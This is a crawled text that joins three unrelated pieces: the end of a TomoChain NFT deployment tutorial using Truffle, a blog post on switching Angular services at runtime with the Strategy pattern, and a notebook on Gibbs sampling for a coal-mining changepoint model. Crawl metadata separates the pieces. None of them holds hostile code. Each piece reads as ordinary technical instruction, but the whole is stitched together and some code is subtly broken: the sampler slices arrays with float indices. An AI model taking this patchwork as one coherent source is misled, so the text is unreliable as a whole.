network_id: "89",
gas: 3000000,
gasPrice: 10000000000000, // TomoChain requires min 10 TOMO to deploy, to fight spamming attacks
}, // Useful for deploying to TomoChain mainnet
tomomainnet: {
provider: () => new HDWalletProvider(
mnemonic,
"",
0,
1,
true,
"m/44'/889'/0'/0/",
),
network_id: "88",
gas: 3000000,
gasPrice: 10000000000000, // TomoChain requires min 10 TOMO to deploy, to fight spamming attacks
}, //
compilers: {
solc: {
version: "0.5.4", //"
// }
}
}
}
3. Remember to update the
truffle.js file using your own wallet recovery phrase. Copy the 12 words previously obtained from your wallet and paste it as the value of the
mnemonic variable.
const mnemonic = '<PUT YOUR WALLET 12-WORD RECOVERY PHRASE HERE>';
⚠️ Warning: In production, it is highly recommend storing the
mnemonicin another secret file (loaded from environment variables or a secure secret management system)...
4.3 Ganache
You can use
Ganache blockchain to test your smart contracts locally, before migrating to a public blockchain like
Ethereum (Ropsten) or
Tomochain.
On a separate console window, install
Ganache and run it:
npm install -g ganache-cli
ganache-cli -p 8545
Ganache will start running, listening on port
8545. Automatically you will have 10 available wallets with their private keys and
100 ETH each. You can use them to test your smart contracts.
5. Adding Tests
We will add now tests to check our smart contracts.
When you deploy contracts your first contract will usually be the deployer. This test will check that.
Create
GradientTokenTest.js in
/test directory and write the following test:
const GradientToken = artifacts.require("GradientToken");contract("Gradient token", accounts => {
it("Should make first account an owner", async () => {
let instance = await GradientToken.deployed();
let owner = await instance.owner();
assert.equal(owner, accounts[0]);
});
});
Here we run the
contract block, that deploys our contract. We wait for the contract to be deployed and request
owner() which returns owner’s address. Then we assert that the owner address is the same as
account[0].
Note: Make sure that
Ganacheis running (on a different console).
Run the test:
truffle test
The test should pass. This means that the smart contract works correctly and it did successfully what it was expected to do.
Adding more tests
Every NFT token will have a unique ID. The first minted token has
ID: 0, the second one has
ID: 1, and on and on…
Now we’ll test the
mint function. Add the following test:
describe("mint", () => {
it("creates token with specified outer and inner colors", async () => {
let instance = await GradientToken.deployed();
let owner = await instance.owner(); let token0 = await instance.mint("#ff00dd", "#ddddff");
let token1 = await instance.mint("#111111", "#ffff22");
let token2 = await instance.mint("#00ff00", "#ffff00"); let gradients1 = await instance.getGradient( 1 );
assert.equal(gradients1.outer, "#111111");
assert.equal(gradients1.inner, "#ffff22");
});
});
This test is simple. First we check that we can mint new tokens. We mint 3 tokens. Then we expect that the unique attributes
outer and
inner of token with tokenId =
1 are saved correctly and we assert it by using the
getGradient function that we created before.
The test passed.
6. Deploying
6.1 Start the migration
You should have your smart contract already compiled. Otherwise, now it’s a good time to do it with
truffle compile.
Note: Check that you have enough
TOMOtokens in your wallet!! I recommend at least
60 TOMOto deploy this smart contract
Back in our terminal, migrate the contract to TomoChain testnet network:
truffle migrate --network tomotestnet
To deploy to TomoChain mainnet is very similar:
truffle migrate --network tomomainnet
The migrations start…
Starting migrations...
======================
> Network name: 'tomotestnet'
> Network id: 89
> Block gas limit: 840000001_initial_migration.js
======================Deploying 'Migrations'
----------------------
> transaction hash: 0x67c0f12247d0bb0add43e81e8ad534df9cd7d3473ef76f5b60cee3e3d34bae1a
> Blocks: 2 Seconds: 5
> contract address: 0x6056dC38715C7d2703a8aA94ee68A964eaE86fdc
> account: 0x169397F515Af9E93539e0F483f8A6FC115de660C
> balance: 90.05683
> gas used: 273162
> gas price: 10000 gwei
> value sent: 0 ETH
> total cost: 2.73162 ETH> Saving artifacts
-------------------------------------
> Total cost: 2.73162 ETH2_deploy_contracts.js
=====================Deploying 'GradientToken'
-------------------------
> transaction hash: 0xca09a87ad8f834644dcb85f8ea89beff74b818eff11d355e0774e6b60c51718c
> Blocks: 2 Seconds: 5
> contract address: 0x8B830F38b798B7b39808A059179f2c228209514C
> account: 0x169397F515Af9E93539e0F483f8A6FC115de660C
> balance: 60.64511
> gas used: 2941172
> gas price: 10000 gwei
> value sent: 0 ETH
> total cost: 29.41172 ETH> Saving artifacts
-------------------------------------
> Total cost: 29.41172 ETHSummary
=======
> Total deployments: 2
> Final cost: 32.14334 ETH
Congratulations! You have already deployed your non-fungible token (NFT) to TomoChain! The deployment fees were
32.14 TOMO.
Read the output text on the screen. The NFT token contract address is (yours will be different):
0x8B830F38b798B7b39808A059179f2c228209514C
⚠️ Note: TomoChain’s smart contract creation fee: gas price 10000 Gwei, gas limit >= 1000000
*** Troubleshooting ***
- Error:
smart contract creation cost is under allowance. Why?Increasing transaction fees for smart contract creation is one of the ways TomoChain offers to defend against spamming attacks. Solution: edit
truffle.jsand add more gas/gasPrice to deploy.
- Error:
insufficient funds for gas * price + value. Why? You don’t have enough tokens in your wallet for gas fees. Solution: you need more funds in your wallet to deploy, go to faucet and get more tokens.
7. Interacting with the smart contract
7.1 Minting new Tokens
Now to create a new Gradient Token you can call:
GradientToken(gradientTokenAddress).mint("#001111", "#002222")
You can call this function via MyEtherWallet/Metamask or Web3... In a DApp or game this would probably be called from a button click in a UI.
Let’s use MyEtherWallet (MEW) to interact with the contract. We use MetaMask to connect to the GradientToken owner wallet in TomoChain (testnet), then we will call function
mint() to mint the first token.
In MyEtherWallet, under menu
Contract >
Interact with Contract two things are required:
- Contract Address: you got this address when you deployed
- ABI: file
build/contracts/GradientToken.json, search
"abi": […
]and copy everything inside brackets, including brackets. Then paste on MEW
On the right you will see a dropdown list with the functions. Select
mint. MEW will show two fields:
outer and
inner. Input two colors, like
#ff0000 or
#0000ff and click the button Write. Confirm with MetaMask.
Here is our contract address, and the new
mint transaction:
You can use MEW to Write and to Read functions, like
getGradient! This way you can check if values are correct, totalSupply, transfer tokens...
Note: In
Ethereum (Ropsten), the Etherscan page with our migrated contract will change after the first token is minted. A new link will be displayed now to track the ERC721 token
GRAD.
What’s next?
A few suggestions to continue from here:
- You could add a lot of different attributes to your unique NFT tokens
- You can connect to a JS front end and show your tokens
- You can have some buttons to interact with the tokens (buy, sell, change, transfer, change attributes/colors, etc…)
- You can iterate on this basic code and create a new CryptoKitties game :)
Congratulations! You have learnt about non-fungible tokens, use-cases of NFTs and how to deploy NFT tokens on TomoChain.
Now we are looking forward to see your awesome ideas implemented! | https://medium.com/tomochain/how-to-deploy-nft-tokens-on-tomochain-fe476a68594d?source=collection_home---4------2----------------------- | CC-MAIN-2019-30 | en | refinedweb |
Switching Angular Services at Runtime
A while ago I've already written a blogpost on how to inject a different Angular service implementation based on a runtime value. With that approach, the selected service was initialized at startup and remained the same for the entire application lifetime. In response to that blogpost, I received a question how one could switch between the implementations while the application is running. This blogpost is my detailed answer to that question.
At least to my knowledge, there's no built-in support for such functionality in Angular's dependency injection implementation. This means that from Angular's point of view the same service will be in use the whole time. The switching logic will have to be implemented inside that service.
Encapsulating Both Implementations in a Single Service
The simplest approach would be to include both implementations inside that single service. For example, the following custom
ErrorHandler service can switch between local and remote error reporting at runtime:
import { Injectable, ErrorHandler } from '@angular/core'; export type ErrorHandlerMode = 'local' | 'remote'; @Injectable() export class CustomErrorHandlerService implements ErrorHandler { mode: ErrorHandlerMode = 'local'; constructor() { } handleError(error: any): void { switch (this.mode) { case 'local': this.handleErrorLocal(error); break; case 'remote': this.handleErrorRemote(error); break; } } private handleErrorLocal(error: any) { console.error(error); } private handleErrorRemote(error: any) { console.log('Send error to remote service.'); } }
The
handleError method delegates the call to the appropriate implementation based on the current value of the
mode property. The value of the property can change at runtime. It can even be bound to an
input element:
<div> <input name="mode" type="radio" id="local" value="local" [(ngModel)]="errorHandler.mode"> <label for="local">Local error reporting</label> </div> <div> <input name="mode" type="radio" id="remote" value="remote" [(ngModel)]="errorHandler.mode"> <label for="remote">Remote error reporting</label> </div>
There are two more prerequisites for this to work:
The custom
ErrorHandlermust be injected into the component which will implement the mode switching:
constructor(public errorHandler: ErrorHandler) { }
The
CustomErrorHandlerServicemust be declared as the provider for the
ErrorHandlerservice in
AppModule:
providers: [ { provide: ErrorHandler, useClass: CustomErrorHandlerService } ],
For simple services, this approach can be good enough. But as the number of methods in the service increases, repeating the switching logic in each one and having to keep everything in a single class will make maintenance more difficult.
Implementing the Strategy Pattern
The Strategy software design pattern is a standard approach for dynamically selecting an algorithm (or an implementation in our case) at runtime. It consists of:
- The
Contextclass which delegates the calls to the correct implementation. In our case, this is the
CustomErrorHandlerService.
- The
Strategyinterface which is the common interface of all the implementations. In our case, this is the
ErrorHandler.
- Multiple classes which implement the
Strategyinterface in a different way. In our case, this will be the
LocalErrorHandlerStrategyand the
RemoteErrorHandlerStrategy.
The following UML diagram describes the relations between them:
Let's take a look at the code. The
handleError method now simply calls the corresponding method in the currently selected strategy. I implemented the switching of strategies in the
mode property setter:
import { LocalErrorHandlerStrategy } from './local-error-handler-strategy.service'; import { Injectable, ErrorHandler } from '@angular/core'; import { RemoteErrorHandlerStrategy } from './remote-error-handler-strategy.service'; export type ErrorHandlerMode = 'local' | 'remote'; @Injectable() export class CustomErrorHandlerService implements ErrorHandler { private modeValue: ErrorHandlerMode; private currentStrategy: ErrorHandler; get mode(): ErrorHandlerMode { return this.modeValue; } set mode(value: ErrorHandlerMode) { this.modeValue = value; switch (value) { case 'local': this.currentStrategy = this.localStrategy; break; case 'remote': this.currentStrategy = this.remoteStrategy; } } constructor( private localStrategy: LocalErrorHandlerStrategy, private remoteStrategy: RemoteErrorHandlerStrategy) { this.mode = 'local'; } handleError(error: any): void { this.currentStrategy.handleError(error); } }
The two strategies are also implemented as Angular services and provided by dependency injection. If I didn't have to do any switching at runtime they could be used as standard services on their own:
import { Injectable, ErrorHandler } from '@angular/core'; @Injectable({ providedIn: 'root' }) export class LocalErrorHandlerStrategy implements ErrorHandler { constructor() { } handleError(error: any): void { console.error(error); } }
import { Injectable, ErrorHandler } from '@angular/core'; @Injectable({ providedIn: 'root' }) export class RemoteErrorHandlerStrategy implements ErrorHandler { constructor() { } handleError(error: any): void { console.log('Send error to remote service.'); } }
The rest of the code remains the same as in the first approach. The Strategy pattern does not affect the public interface of the
CustomErrorHandlerService. It only changes how the switching is handled internally allowing proper separation between the different implementations. | http://www.damirscorner.com/blog/posts/20190510-SwitchingAngularServicesAtRuntime.html | CC-MAIN-2019-30 | en | refinedweb |
Computational Methods in Bayesian Analysis in Python
Monte Carlo simulations, Markov chains, Gibbs sampling illustrated in Plotly
About the author: This notebook was forked from this project. The original author is Chris Fonnesbeck, Assistant Professor of Biostatistics. You can follow Chris on Twitter @fonnesbeck.
Introduction¶
For most problems of interest, Bayesian analysis requires integration over multiple parameters, making the calculation of a posterior intractable whether via analytic methods or standard methods of numerical integration.
However, it is often possible to approximate these integrals by drawing samples from posterior distributions. For example, consider the expected value (mean) of a vector-valued random variable $\mathbf{x}$:$$ E[\mathbf{x}] = \int \mathbf{x} f(\mathbf{x}) \mathrm{d}\mathbf{x}\,, \quad \mathbf{x} = \{x_1, \ldots, x_k\} $$
where $k$ (dimension of vector $\mathbf{x}$) is perhaps very large.
If we can produce a reasonable number of random vectors $\{{\bf x_i}\}$, we can use these values to approximate the unknown integral. This process is known as Monte Carlo integration. In general, Monte Carlo integration allows integrals against probability density functions$$ I = \int h(\mathbf{x}) f(\mathbf{x}) \mathrm{d}\mathbf{x} $$
to be estimated by finite sums$$ \hat{I} = \frac{1}{n}\sum_{i=1}^n h(\mathbf{x}_i), $$
where $\mathbf{x}_i$ is a sample from $f$. This estimate is valid and useful because:
$\hat{I} \rightarrow I$ with probability $1$ by the strong law of large numbers;
simulation error can be measured and controlled.
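To ground this, here is a small sketch of my own (not from the original notebook) that approximates $E[X^2]$ under a standard normal density, whose exact value is 1, and also reports the Monte Carlo standard error that lets us measure and control the simulation error:

```python
import numpy as np

np.random.seed(42)

def mc_integrate(h, sampler, n):
    """Approximate E[h(X)] = ∫ h(x) f(x) dx by a Monte Carlo average,
    returning the estimate and its standard error."""
    draws = h(sampler(n))
    return draws.mean(), draws.std(ddof=1) / np.sqrt(n)

# E[X^2] under a standard normal density is exactly 1.
estimate, se = mc_integrate(lambda x: x**2, np.random.standard_normal, 100000)
```

Increasing `n` shrinks the standard error at the familiar $1/\sqrt{n}$ rate.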
Example (Negative Binomial Distribution)
We can use this kind of simulation to estimate the expected value of a random variable that is negative binomial-distributed. The negative binomial distribution applies to discrete non-negative random variables. It can be used to model the number of successes observed in a sequence of Bernoulli trials before a total of $r$ failures occurs.

The probability mass function reads$$ f(k \mid p, r) = {k + r - 1 \choose k} p^k (1 - p)^r\,, $$

where $k \in \{0, 1, 2, \ldots \}$ is the number of successes observed before the $r$-th failure and $p$ is the probability of success in each trial ($0 < p < 1$).
Most frequently, this distribution is used to model overdispersed counts, that is, counts whose variance is larger than their mean (a Poisson distribution, by contrast, has variance equal to its mean).

In fact, the negative binomial can be expressed as a continuous mixture of Poisson distributions, where a gamma distribution supplies the mixing weights:$$ f(k \mid p, r) = \int_0^{\infty} \text{Poisson}(k \mid \lambda) \, \text{Gamma}_{(r, (1 - p)/p)}(\lambda) \, \mathrm{d}\lambda, $$
where the parameters of the gamma distribution are denoted as (shape parameter, inverse scale parameter).
Let's resort to simulation to estimate the mean of a negative binomial distribution with $p = 0.7$ and $r = 3$:
import numpy as np

r = 3
p = 0.7

# Simulate Gamma means (r: shape parameter; p / (1 - p): scale parameter).
lam = np.random.gamma(r, p / (1 - p), size=100)

# Simulate sample Poisson conditional on lambda.
sim_vals = np.random.poisson(lam)
sim_vals.mean()
6.3399999999999999
The actual expected value of the negative binomial distribution is $r p / (1 - p)$, which in this case is 7. That's pretty close, though we can do better if we draw more samples:
lam = np.random.gamma(r, p / (1 - p), size=100000)
sim_vals = np.random.poisson(lam)
sim_vals.mean()
7.0135199999999998
This approach of drawing repeated random samples in order to obtain a desired numerical result is generally known as Monte Carlo simulation.
Clearly, this is a convenient, simplistic example that did not require simulation to obtain an answer. For most problems, it is simply not possible to draw independent random samples from the posterior distribution, because it will generally be (1) multivariate and (2) not of a known functional form for which there is a pre-existing random number generator.
However, we are not going to give up on simulation. Though we cannot generally draw independent samples for our model, we can usually generate dependent samples, and it turns out that if we do this in a particular way, we can obtain samples from almost any posterior distribution.
Markov Chains
A Markov chain is a special type of stochastic process. The standard definition of a stochastic process is an ordered collection of random variables:$$ \{X_t:t \in T\} $$
where $t$ is frequently (but not necessarily) a time index. If we think of $X_t$ as a state $X$ at time $t$, and invoke the following dependence condition on each state:\begin{align*} &Pr(X_{t+1}=x_{t+1} | X_t=x_t, X_{t-1}=x_{t-1},\ldots,X_0=x_0) \\ &= Pr(X_{t+1}=x_{t+1} | X_t=x_t) \end{align*}
then the stochastic process is known as a Markov chain. This conditioning specifies that the future depends on the current state, but not past states. Thus, the Markov chain wanders about the state space, remembering only where it has just been in the last time step.
The collection of transition probabilities is sometimes called a transition matrix when dealing with discrete states, or more generally, a transition kernel.
It is useful to think of the Markovian property as mild non-independence.
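As an illustration (the two-state chain below is made up for this sketch, not part of the original text), the following code simulates a Markov chain directly from its transition matrix; note that each draw depends only on the current state:

```python
import numpy as np

np.random.seed(1)

# Transition matrix of a hypothetical two-state chain (rows sum to 1).
P = np.array([[0.9, 0.1],
              [0.5, 0.5]])

def simulate_chain(P, x0, n_steps):
    # The next state is drawn using only the current state's row:
    # this is exactly the Markov (memoryless) property.
    states = [x0]
    for _ in range(n_steps):
        states.append(np.random.choice(len(P), p=P[states[-1]]))
    return np.array(states)

chain = simulate_chain(P, x0=0, n_steps=50000)

# The long-run fraction of time spent in each state approaches the
# stationary distribution of this chain, (5/6, 1/6).
empirical = np.bincount(chain) / len(chain)
```

The empirical state frequencies settle close to $(5/6, 1/6)$, the stationary distribution one obtains by solving $\pi = \pi P$ for this particular matrix.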
If we use Monte Carlo simulation to generate a Markov chain, this is called Markov chain Monte Carlo, or MCMC. If the resulting Markov chain obeys some important properties, then it allows us to indirectly generate independent samples from a particular posterior distribution.
Why MCMC Works: Reversible Markov Chains
Markov chain Monte Carlo simulates a Markov chain for which some function of interest (e.g., the joint distribution of the parameters of some model) is the unique, invariant limiting distribution. A distribution $\pi$ is invariant with respect to a Markov chain with transition kernel $Pr(y \mid x)$ if:$$\int_x Pr(y \mid x) \pi(x) dx = \pi(y).$$
Invariance is guaranteed for any reversible Markov chain. Consider a Markov chain in reverse sequence: $\{\theta^{(n)},\theta^{(n-1)},...,\theta^{(0)}\}$. This sequence is still Markovian, because:$$Pr(\theta^{(k)}=y \mid \theta^{(k+1)}=x,\theta^{(k+2)}=x_1,\ldots ) = Pr(\theta^{(k)}=y \mid \theta^{(k+1)}=x)$$
Forward and reverse transition probabilities may be related through Bayes theorem:$$Pr(\theta^{(k)}=y \mid \theta^{(k+1)}=x) = \frac{Pr(\theta^{(k+1)}=x \mid \theta^{(k)}=y)\, \pi^{(k)}(y)}{\pi^{(k+1)}(x)}$$
Though not homogeneous in general, $\pi$ becomes homogeneous if:
- $n \rightarrow \infty$, or
- $\pi^{(i)}=\pi$ for some $i < k$.
If this chain is homogeneous it is called reversible, because it satisfies the detailed balance equation:$$\pi(x)Pr(y \mid x) = \pi(y) Pr(x \mid y)$$
Reversibility is important because it has the effect of balancing movement through the entire state space. When a Markov chain is reversible, $\pi$ is the unique, invariant, stationary distribution of that chain. Hence, if $\pi$ is of interest, we need only find the reversible Markov chain for which $\pi$ is the limiting distribution. This is what MCMC does!
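We can verify these claims numerically on a toy chain. The transition matrix and distribution below are my own illustrative choices: the chain is a small birth-death chain on three states, and the code checks both the detailed balance equation and the resulting invariance $\pi P = \pi$:

```python
import numpy as np

# A small birth–death chain on {0, 1, 2}: moves only between neighbors.
P = np.array([[0.50, 0.50, 0.00],
              [0.25, 0.50, 0.25],
              [0.00, 0.50, 0.50]])

# Candidate stationary distribution.
pi = np.array([0.25, 0.50, 0.25])

# Detailed balance: pi(x) P(x, y) == pi(y) P(y, x) for every pair,
# i.e. the matrix of probability flows pi(x) P(x, y) is symmetric.
flows = pi[:, None] * P
balanced = np.allclose(flows, flows.T)

# Invariance follows from detailed balance: pi P == pi.
invariant = np.allclose(pi @ P, pi)
```

Both checks pass for this chain, illustrating how detailed balance implies that $\pi$ is the invariant distribution.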
Gibbs Sampling
The Gibbs sampler is the simplest and most prevalent MCMC algorithm. If a posterior has $k$ parameters to be estimated, we may condition each parameter on the current values of the other $k-1$ parameters and sample from the resulting conditional distribution (which is usually easier to sample from), repeating this operation for each parameter in turn. This procedure generates samples from the posterior distribution. Note that we have now combined Markov chains (conditional independence) and Monte Carlo techniques (estimation by simulation) to yield Markov chain Monte Carlo.
Here is a stereotypical Gibbs sampling algorithm:
Choose starting values for states (parameters): ${\bf \theta} = [\theta_1^{(0)},\theta_2^{(0)},\ldots,\theta_k^{(0)}]$.
Initialize counter $j=1$.
Draw the following values from each of the $k$ conditional distributions:
$$\begin{aligned} \theta_1^{(j)} &\sim& \pi(\theta_1 | \theta_2^{(j-1)},\theta_3^{(j-1)},\ldots,\theta_{k-1}^{(j-1)},\theta_k^{(j-1)}) \\ \theta_2^{(j)} &\sim& \pi(\theta_2 | \theta_1^{(j)},\theta_3^{(j-1)},\ldots,\theta_{k-1}^{(j-1)},\theta_k^{(j-1)}) \\ \theta_3^{(j)} &\sim& \pi(\theta_3 | \theta_1^{(j)},\theta_2^{(j)},\ldots,\theta_{k-1}^{(j-1)},\theta_k^{(j-1)}) \\ \vdots \\ \theta_{k-1}^{(j)} &\sim& \pi(\theta_{k-1} | \theta_1^{(j)},\theta_2^{(j)},\ldots,\theta_{k-2}^{(j)},\theta_k^{(j-1)}) \\ \theta_k^{(j)} &\sim& \pi(\theta_k | \theta_1^{(j)},\theta_2^{(j)},\theta_3^{(j)},\ldots,\theta_{k-2}^{(j)},\theta_{k-1}^{(j)})\end{aligned}$$
Increment $j$ and repeat until convergence occurs.
As we can see from the algorithm, each distribution is conditioned on the last iteration of its chain values, constituting a Markov chain as advertised. The Gibbs sampler has all of the important properties outlined in the previous section: it is aperiodic, homogeneous and ergodic. Once the sampler converges, all subsequent samples are from the target distribution. This convergence occurs at a geometric rate.
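Before tackling a real model, here is a minimal Gibbs sketch of my own (not from the original notebook) for a standard bivariate normal with correlation $\rho$. Each full conditional is a univariate normal, $x \mid y \sim N(\rho y,\, 1-\rho^2)$, so both conditionals are easy to sample from:

```python
import numpy as np

np.random.seed(7)

rho = 0.8            # target correlation
n_samples = 20000

x = np.empty(n_samples)
y = np.empty(n_samples)
x[0] = y[0] = 0.0

# Alternate draws from the two full conditionals; each one is a
# univariate normal with mean rho * (other coordinate).
sd = np.sqrt(1 - rho**2)
for i in range(1, n_samples):
    x[i] = np.random.normal(rho * y[i - 1], sd)
    y[i] = np.random.normal(rho * x[i], sd)

sample_corr = np.corrcoef(x, y)[0, 1]
```

After convergence, the paired draws behave like samples from the joint bivariate normal, and the sample correlation approaches $\rho$.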
Example: Inferring patterns in UK coal mining disasters
Let's try to model a more interesting example, a time series of recorded coal mining disasters in the UK from 1851 to 1962.
Occurrences of disasters in the time series is thought to be derived from a Poisson process with a large rate parameter in the early part of the time series, and from one with a smaller rate in the later part. We are interested in locating the change point in the series, which perhaps is related to changes in mining safety regulations.
# Annual counts of UK coal mining disasters (Jarrett 1979).
disasters_array = np.array([4, 5, 4, 0, 1, 4, 3, 4, 0, 6, 3, 3, 4, 0, 2, 6,
                            3, 3, 5, 4, 5, 3, 1, 4, 4, 1, 5, 5, 3, 4, 2, 5,
                            2, 2, 3, 4, 2, 1, 3, 2, 2, 1, 1, 1, 1, 3, 0, 0,
                            1, 0, 1, 1, 0, 0, 3, 1, 0, 3, 2, 2, 0, 1, 1, 1,
                            0, 1, 0, 1, 0, 0, 0, 2, 1, 0, 0, 0, 1, 1, 0, 2,
                            3, 3, 1, 1, 2, 1, 1, 1, 1, 2, 4, 2, 0, 0, 1, 4,
                            0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 1])
n_count_data = len(disasters_array)
import plotly.plotly as py
import plotly.graph_objs as pgo
data = pgo.Data([
    pgo.Scatter(
        x=[str(year) + '-01-01' for year in np.arange(1851, 1962)],
        y=disasters_array,
        mode='lines+markers'
    )
])
layout = pgo.Layout(
    title='UK coal mining disasters (per year), 1851--1962',
    xaxis=pgo.XAxis(title='Year', type='date',
                    range=['1851-01-01', '1962-01-01']),
    yaxis=pgo.YAxis(title='Disaster count')
)
fig = pgo.Figure(data=data, layout=layout)
py.iplot(fig, filename='coal_mining_disasters')
We are going to use Poisson random variables for this type of count data. Denoting year $i$'s accident count by $y_i$,$$y_i \sim \text{Poisson}(\lambda).$$
For those unfamiliar, Poisson random variables look like this:
data2 = pgo.Data([
    pgo.Histogram(
        x=np.random.poisson(l, 1000),
        opacity=0.75,
        name=u'λ=%i' % l
    ) for l in [1, 5, 12, 25]
])
layout_grey_bg = pgo.Layout(
    xaxis=pgo.XAxis(zeroline=False, showgrid=True,
                    gridcolor='rgb(255, 255, 255)'),
    yaxis=pgo.YAxis(zeroline=False, showgrid=True,
                    gridcolor='rgb(255, 255, 255)'),
    paper_bgcolor='rgb(255, 255, 255)',
    plot_bgcolor='rgba(204, 204, 204, 0.5)'
)
layout2 = layout_grey_bg.copy()
layout2.update(
    barmode='overlay',
    title='Poisson Means',
    xaxis=pgo.XAxis(range=[0, 50]),
    yaxis=pgo.YAxis(range=[0, 400])
)
fig2 = pgo.Figure(data=data2, layout=layout2)
py.iplot(fig2, filename='poisson_means')
The modeling problem is about estimating the values of the $\lambda$ parameters. Looking at the time series above, it appears that the rate declines over time.
A changepoint model identifies a point (here, a year) after which the parameter $\lambda$ drops to a lower value. Let us call this point in time $\tau$. So we are estimating two $\lambda$ parameters: $\lambda = \lambda_1$ if $t \lt \tau$ and $\lambda = \lambda_2$ if $t \geq \tau$.
We need to assign prior probabilities to both $\{\lambda_1, \lambda_2\}$. The gamma distribution not only provides a continuous density function for positive numbers, but it is also conjugate with the Poisson sampling distribution.
lambda1_lambda2 = [(0.1, 100), (1, 100), (1, 10), (10, 10)]
data3 = pgo.Data([
    pgo.Histogram(
        x=np.random.gamma(*p, size=1000),
        opacity=0.75,
        name=u'α=%g, β=%g' % (p[0], p[1])
    ) for p in lambda1_lambda2
])
layout3 = layout_grey_bg.copy()
layout3.update(
    barmode='overlay',
    xaxis=pgo.XAxis(range=[0, 300])
)
fig3 = pgo.Figure(data=data3, layout=layout3)
py.iplot(fig3, filename='gamma_distributions')
We will specify suitably vague hyperparameters $\alpha$ and $\beta$ for both priors:\begin{align} \lambda_1 &\sim \text{Gamma}(1, 10), \\ \lambda_2 &\sim \text{Gamma}(1, 10). \end{align}
Since we do not have any intuition about the location of the changepoint (unless we visualize the data), we will assign a discrete uniform prior over the entire observation period [1851, 1962]:\begin{align} &\tau \sim \text{DiscreteUniform(1851, 1962)}\\ &\Rightarrow P(\tau = k) = \frac{1}{111}. \end{align}
Implementing Gibbs sampling
We are interested in estimating the joint posterior of $\lambda_1, \lambda_2$ and $\tau$ given the array of annnual disaster counts $\mathbf{y}$. This gives:$$ P( \lambda_1, \lambda_2, \tau | \mathbf{y} ) \propto P(\mathbf{y} | \lambda_1, \lambda_2, \tau ) P(\lambda_1, \lambda_2, \tau) $$
To employ Gibbs sampling, we need to factor the joint posterior into the product of conditional expressions:$$ P(\lambda_1, \lambda_2, \tau | \mathbf{y}) \propto P(y_{t \lt \tau} | \lambda_1, \tau) P(y_{t \geq \tau} | \lambda_2, \tau) P(\lambda_1) P(\lambda_2) P(\tau) $$
which we have specified as:$$\begin{aligned} P( \lambda_1, \lambda_2, \tau | \mathbf{y} ) &\propto \left[\prod_{t=1851}^{\tau} \text{Poi}(y_t|\lambda_1) \prod_{t=\tau+1}^{1962} \text{Poi}(y_t|\lambda_2) \right] \text{Gamma}(\lambda_1|\alpha,\beta) \text{Gamma}(\lambda_2|\alpha, \beta) \frac{1}{111} \\ &\propto \left[\prod_{t=1851}^{\tau} e^{-\lambda_1}\lambda_1^{y_t} \prod_{t=\tau+1}^{1962} e^{-\lambda_2} \lambda_2^{y_t} \right] \lambda_1^{\alpha-1} e^{-\beta\lambda_1} \lambda_2^{\alpha-1} e^{-\beta\lambda_2} \\ &\propto \lambda_1^{\sum_{t=1851}^{\tau} y_t +\alpha-1} e^{-(\beta+\tau)\lambda_1} \lambda_2^{\sum_{t=\tau+1}^{1962} y_i + \alpha-1} e^{-\beta\lambda_2} \end{aligned}$$
So, the full conditionals are known, and critically for Gibbs, can easily be sampled from.$$\lambda_1 \sim \text{Gamma}(\sum_{t=1851}^{\tau} y_t +\alpha, \tau+\beta)$$$$\lambda_2 \sim \text{Gamma}(\sum_{t=\tau+1}^{1962} y_t + \alpha, 1962-\tau+\beta)$$$$\tau \sim \text{Categorical}\left( \frac{\lambda_1^{\sum_{t=1851}^{\tau} y_t +\alpha-1} e^{-(\beta+\tau)\lambda_1} \lambda_2^{\sum_{t=\tau+1}^{1962} y_t + \alpha-1} e^{-(\beta+1962-\tau)\lambda_2}}{\sum_{k=1851}^{1962} \lambda_1^{\sum_{t=1851}^{k} y_t +\alpha-1} e^{-(\beta+k)\lambda_1} \lambda_2^{\sum_{t=k+1}^{1962} y_t + \alpha-1} e^{-(\beta+1962-k)\lambda_2}} \right)$$
Implementing this in Python requires random number generators for both the gamma and discrete uniform distributions. We can leverage NumPy for this:
# Function to draw random gamma variates
rgamma = np.random.gamma

def rcategorical(probs, n=None):
    # Function to draw random categorical variates
    return np.array(probs).cumsum().searchsorted(np.random.sample(n))
Next, in order to generate probabilities for the conditional posterior of $\tau$, we need the kernel of the gamma density:
$$\lambda^{\alpha-1} e^{-\beta \lambda}$$
dgamma = lambda lam, a, b: lam**(a - 1) * np.exp(-b * lam)
Diffuse hyperpriors for the gamma priors on $\{\lambda_1, \lambda_2\}$:
alpha, beta = 1., 10
For computational efficiency, it is best to pre-allocate memory to store the sampled values. We need 3 arrays, each with length equal to the number of iterations we plan to run:
# Specify number of iterations
n_iterations = 1000

# Initialize trace of samples
lambda1, lambda2, tau = np.empty((3, n_iterations + 1))
The penultimate step initializes the model parameters to arbitrary values:
lambda1[0] = 6
lambda2[0] = 2
tau[0] = 50
Now we can run the Gibbs sampler.
# Sample from conditionals
for i in range(n_iterations):

    # Sample early mean
    lambda1[i + 1] = rgamma(disasters_array[:tau[i]].sum() + alpha,
                            1. / (tau[i] + beta))

    # Sample late mean
    lambda2[i + 1] = rgamma(disasters_array[tau[i]:].sum() + alpha,
                            1. / (n_count_data - tau[i] + beta))

    # Sample changepoint: first calculate the (conditional) probabilities ...
    p = np.array([dgamma(lambda1[i + 1], disasters_array[:t].sum() + alpha, t + beta) *
                  dgamma(lambda2[i + 1], disasters_array[t:].sum() + alpha,
                         n_count_data - t + beta)
                  for t in range(n_count_data)])

    # ... then draw a sample
    tau[i + 1] = rcategorical(p / p.sum())
Plotting the trace and histogram of the samples reveals the marginal posteriors of each parameter in the model.
color = '#3182bd'
trace1 = pgo.Scatter(y=lambda1, xaxis='x1', yaxis='y1',
                     line=pgo.Line(width=1), marker=pgo.Marker(color=color))

trace2 = pgo.Histogram(x=lambda1, xaxis='x2', yaxis='y2',
                       marker=pgo.Marker(color=color))

trace3 = pgo.Scatter(y=lambda2, xaxis='x3', yaxis='y3',
                     line=pgo.Line(width=1), marker=pgo.Marker(color=color))

trace4 = pgo.Histogram(x=lambda2, xaxis='x4', yaxis='y4',
                       marker=pgo.Marker(color=color))

trace5 = pgo.Scatter(y=tau, xaxis='x5', yaxis='y5',
                     line=pgo.Line(width=1), marker=pgo.Marker(color=color))

trace6 = pgo.Histogram(x=tau, xaxis='x6', yaxis='y6',
                       marker=pgo.Marker(color=color))
data4 = pgo.Data([trace1, trace2, trace3, trace4, trace5, trace6])
import plotly.tools as tls
fig4 = tls.make_subplots(3, 2)

fig4['data'] += data4
def add_style(fig):
    for i in fig['layout'].keys():
        fig['layout'][i]['zeroline'] = False
        fig['layout'][i]['showgrid'] = True
